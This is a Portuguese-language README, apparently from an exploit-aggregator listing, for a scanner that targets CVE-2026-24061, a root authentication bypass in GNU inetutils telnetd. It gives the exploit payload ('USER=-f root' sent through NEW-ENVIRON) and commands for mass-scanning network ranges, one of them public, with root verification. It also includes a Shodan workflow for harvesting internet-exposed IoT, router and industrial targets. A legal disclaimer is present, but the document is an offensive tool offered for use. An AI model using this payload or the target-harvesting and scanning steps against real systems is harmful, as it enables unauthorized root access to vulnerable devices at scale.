Share
## https://sploitus.com/exploit?id=6270028E-9445-57FF-99A0-F4C9EA4D3BAB
# CVE-2026-24061 Scanner – GNU inetutils telnetd Auth Bypass

**⚠️ AVISO LEGAL MUITO IMPORTANTE ⚠️**  
Esta ferramenta é **exclusivamente para fins educacionais, pesquisa de segurança, análise de vulnerabilidades e testes autorizados**.  
- Qualquer uso **não autorizado** contra sistemas que você não possui ou não tem permissão explícita por escrito é **crime** (no Brasil: art. 154-A do Código Penal + Lei 14.155/2021, entre outras legislações internacionais).  
- Use **apenas** em ambientes próprios, laboratórios controlados ou durante pentests/red team com **RoE (Rules of Engagement)** assinado.  
- O autor **não se responsabiliza** por qualquer uso indevido, dano, bloqueio de IP, consequências legais ou exploração maliciosa.

## Sobre a Vulnerabilidade (CVE-2026-24061)

- **Nome oficial**: GNU inetutils telnetd ≤ 2.7 – Authentication Bypass to Root Shell  
- **CVSS**: 9.8 (Crítico)  
- **Exploração**: Envio de `USER=-f root` (ou variações) via opção NEW-ENVIRON permite login imediato como root sem senha.  
- **Afetados**: Dispositivos IoT, roteadores antigos, sistemas embarcados, NAS, DVRs, PLCs industriais que ainda usam **GNU inetutils telnetd** (versões ≤ 2.7).  
- **Status em fevereiro 2026**: Em exploração ativa no wild (CISA KEV desde jan/2026, GreyNoise detectando tentativas diárias).

### Agradecimento especial

Este scanner só foi possível graças à excelente análise técnica e prova de conceito publicada pela equipe da **Hakai Security**.  
O artigo detalhado deles forneceu as bases técnicas precisas sobre o vetor de exploração, os payloads reais e o comportamento do telnetd vulnerável.

→ Leia a análise completa aqui:  
[https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/](https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/)

**Muito obrigado à Hakai Security** pela transparência, qualidade técnica e contribuição para a comunidade de segurança. Vocês ajudaram a tornar essa ferramenta mais precisa e útil para pesquisa responsável.

## Funcionalidades do Scanner

- Suporte a IPs individuais, CIDRs (/24, /16, etc.) e arquivos .txt com lista de alvos  
- Detecção automática de classe IPv4 classful (A/B/C) com aviso para redes grandes  
- Geração dinâmica de múltiplos payloads (-f root, -f admin, variações com --, -p, etc.)  
- Lista de usuários customizável via `--users` (default inclui root, admin, pi, ubuntu, debian, etc.)  
- Verificação real de root via `id` e `whoami` (--verify)  
- Captura e exibição de banner Telnet (--banner)  
- Detecção precoce de SSH na porta 23 (pula teste para evitar falsos positivos)  
- Execução paralela (ajustável com `-w`)  
- Saída colorida: **VERMELHO FORTE + "!!! VULNERÁVEL !!!"** para vulneráveis  
- Tratamento gracioso de Ctrl+C  
- Resultados salvos em JSON ordenados por IP  

## Instalação

```bash
# Recomendado: use virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate

# Instale dependências
pip install telnetlib3 colorama

```

## Uso Básico 

```# Scan em rede pequena com verificação
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50

# Com lista de alvos (ex: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json

# Focado em root (mais rápido)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5

# Dry-run (só lista IPs)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
```

## Como Obter Alvos (exemplo com Shodan CLI)

```# Instale shodan-cli
pip install shodan

# Inicialize com sua API Key
shodan init SUA_API_KEY_AQUI

# Baixe possíveis alvos
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'

# Extrai IPs
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt

# Scan
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
```
## Contribuições

Pull requests são bem-vindos, desde que mantenham o foco ético e reforcem avisos de responsabilidade.
Licença
MIT License – mas reforço: o uso não autorizado é de responsabilidade exclusiva do usuário.
Feito para estudo, conscientização e pesquisa de segurança.
⭐ Se achou útil, dê uma estrela!
🛡️ Use com extrema responsabilidade.

Made with ❤️ by killsystema